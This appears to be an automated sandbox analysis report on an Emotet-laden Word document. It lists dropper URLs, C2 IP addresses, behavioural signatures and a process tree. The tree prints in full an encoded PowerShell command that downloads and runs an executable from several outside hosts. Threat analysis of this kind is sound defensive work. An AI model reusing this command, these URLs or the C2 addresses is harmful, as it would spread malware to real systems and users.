Analysis

  • max time kernel
    30s
  • resource
    win10v191014
  • submitted
    30-01-2020 08:36

General

  • Target

    2d81565b3a488568df69e8fcacd9ca24b4afb50ce479521fbf15e31e65e1311c.doc

  • Sample

    200130-r3exzkps8j

  • SHA256

    2d81565b3a488568df69e8fcacd9ca24b4afb50ce479521fbf15e31e65e1311c

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://www.tejasviprabhulkar.com/wp-content/bVK29415/

exe.dropper

http://skylines-tec.com/wp-includes/sYYek57/

exe.dropper

https://kz.f-chain.com/wp-content/zDYaqX/

exe.dropper

http://sittay.com/wp1/trXrrE/

exe.dropper

http://www.yitongyilian.com/calendar/LtMHbKKL/

Extracted

Family

emotet

C2

70.184.112.55:80

5.34.158.102:80

144.139.91.187:80

104.236.161.64:8080

89.19.20.202:443

12.162.84.2:8080

74.50.51.115:7080

172.104.169.32:8080

177.188.121.26:443

89.32.150.160:8080

177.103.159.44:80

87.106.46.107:8080

188.135.15.49:80

31.16.195.72:80

119.59.124.163:8080

113.190.254.245:80

77.55.211.77:8080

187.54.225.76:80

200.45.187.90:80

5.196.35.138:7080

rsa_pubkey.plain

Signatures

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Suspicious use of WriteProcessMemory 1 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2d81565b3a488568df69e8fcacd9ca24b4afb50ce479521fbf15e31e65e1311c.doc" /o ""
    1⤵
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    • Checks processor information in registry
    • Suspicious behavior: AddClipboardFormatListener
    PID:4844
  • C:\Windows\System32\WindowsPowerShell\v1.0\PoWERsheLL.exe
    PoWERsheLL -e JABZAGUAZQBsAHQAbABrAGEAdQB3AD0AJwBMAGwAZAB4AHIAdgBuAHAAdQBwAGgAeQB0ACcAOwAkAEsAYgB0AGoAbwBwAHcAbwB0AGcAIAA9ACAAJwAyADcANQAnADsAJABZAGYAcgB1AGkAcAB3AG0AYQA9ACcAWQBwAGkAcQBvAGYAdwB5ACcAOwAkAEIAcAB4AHUAcQBmAGoAeABqAGEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEsAYgB0AGoAbwBwAHcAbwB0AGcAKwAnAC4AZQB4AGUAJwA7ACQAWgB3AHgAcwBxAG4AaQB4AGcAcwA9ACcARgBjAHAAZQBhAG4AdwBwAHIAdwB1ACcAOwAkAFkAcABtAGQAdwBtAHkAdwBkAHkAPQAuACgAJwBuAGUAJwArACcAdwAtACcAKwAnAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAG4AZQBUAC4AdwBlAEIAQwBMAEkARQBuAFQAOwAkAEYAdgBvAGcAdwBsAGoAZwB1AGMAYgBzAHgAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgB0AGUAagBhAHMAdgBpAHAAcgBhAGIAaAB1AGwAawBhAHIALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBiAFYASwAyADkANAAxADUALwAqAGgAdAB0AHAAOgAvAC8AcwBrAHkAbABpAG4AZQBzAC0AdABlAGMALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHMAWQBZAGUAawA1ADcALwAqAGgAdAB0AHAAcwA6AC8ALwBrAHoALgBmAC0AYwBoAGEAaQBuAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AegBEAFkAYQBxAFgALwAqAGgAdAB0AHAAOgAvAC8AcwBpAHQAdABhAHkALgBjAG8AbQAvAHcAcAAxAC8AdAByAFgAcgByAEUALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgB5AGkAdABvAG4AZwB5AGkAbABpAGEAbgAuAGMAbwBtAC8AYwBhAGwAZQBuAGQAYQByAC8ATAB0AE0ASABiAEsASwBMAC8AJwAuACIAUwBgAHAATABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABBAG0AegBzAHMAdwBpAHMAcwB5AGoAPQAnAFMAYgBuAG8AdQBmAHEAaQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQQByAHoAbQBxAGsAdQB1ACAAaQBuACAAJABGAHYAbwBnAHcAbABqAGcAdQBjAGIAcwB4ACkAewB0AHIAeQB7ACQAWQBwAG0AZAB3AG0AeQB3AGQAeQAuACIARABvAHcAYABOAGwAYABPAEEAYABEAGYASQBsAEUAIgAoACQAQQByAHoAbQBxAGsAdQB1ACwAIAAkAEIAcAB4AHUAcQBmAGoAeABqAGEAKQA7ACQAQQBqAGYAaQBjAG4AdgBkAGIAPQAnAFEAYgBqAGUAbgB2AGUAeAAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEIAcAB4AHUAcQBmAGoAeABqAGEAKQAuACIAbABFAGAATgBgAEcAdABoACIAIAAtAGcAZQAgADMAMAAyADQAOAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwByAEUAYABBAHQAZQAiACgAJABCAHAAeAB1AHEAZgBqAHgAagBhACkAOwAkAEsAeQB2AHUAYgBjAGIAcABjAD0AJwBIAHkAagBtAG8AZwBmAHgAdgBoAHAAJwA7AGIAcgBlAGEAawA7ACQAQQBlAGsAZwBrAG0AbAB3AD0AJwBaAGgAbgBoAGwAcwBiAG0AYwB2AGEAdQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABCAGgAeAByAHAAaQB5AHUAegB0AHUAeAA9ACcARQBxAHcAdABmAGQAagBmAGEAegB1AGUAJwA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    PID:4300
  • C:\Users\Admin\275.exe
    C:\Users\Admin\275.exe
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:4552
    • C:\Users\Admin\275.exe
      --b390b04e
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      • Suspicious behavior: EmotetMutantsSpam
      • Drops file in System32 directory
      PID:4564
  • C:\Windows\SysWOW64\corsmfidl.exe
    "C:\Windows\SysWOW64\corsmfidl.exe"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    PID:4612

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/4552-8-0x0000000000B60000-0x0000000000B76000-memory.dmp

    Filesize

    88KB

  • memory/4564-10-0x0000000000690000-0x00000000006A6000-memory.dmp

    Filesize

    88KB

  • memory/4564-11-0x0000000000400000-0x0000000000521000-memory.dmp

    Filesize

    1.1MB

  • memory/4612-13-0x0000000000760000-0x0000000000776000-memory.dmp

    Filesize

    88KB